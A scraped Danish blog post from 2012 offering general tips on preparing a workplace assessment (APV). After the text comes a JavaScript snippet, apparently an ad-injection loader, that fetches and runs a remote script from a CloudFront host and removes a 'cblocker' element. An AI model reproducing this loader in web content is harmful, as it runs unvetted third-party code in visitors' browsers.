Smartlog v3 » Tips, Guides & Informationer » Hjælp til den gode APV
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Hjælp til den gode APV

14. Aug 2012 13:02, webmayn

Man skal nå så meget – som menneske i al almindelighed og som erhvervsdrivende i særdeleshed. Der er krav fra alle sider om indtjening, præstationer og sunde, glade, tilfredse medarbejdere.

Og lige netop de glade medarbejdere stilles der høje krav til – både til medarbejderne selv, men også til det simple spørgsmål, om de har det godt på deres arbejdsplads. Både fysisk og psykisk skal arbejdsmiljøet være behageligt og i så lav en grad som muligt påvirke den ansatte.

Et hjælpemiddel i kampen for gode arbejdsmiljøer er arbejdspladsvurderingen – bedre kendt som APV. Alle arbejdspladser med ansatte skal udarbejde en sådan, og der er helt standardiserede krav til, hvordan sådan en skal udformes.

For at lave en god og grundig APV er der flere steder, du kan søge hjælp. På nettet kan du finde frem til forskellige organisationer, der alle står til rådighed med hjælp og vejledning. På disses hjemmesider kan du finde modeller til kortlægningsskemaer, handlingsplaner og hele vurderinger. Du kan også læse i allerede udarbejdede APV’er – det skulle gerne give dig et godt indblik i, hvordan du udarbejder den bedst mulige vurdering af arbejdspladsen, der også overholder de gældende lovkrav.

Du kan også altid møde op på dit lokale APV kontor for at få personlige råd og vejledning.

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede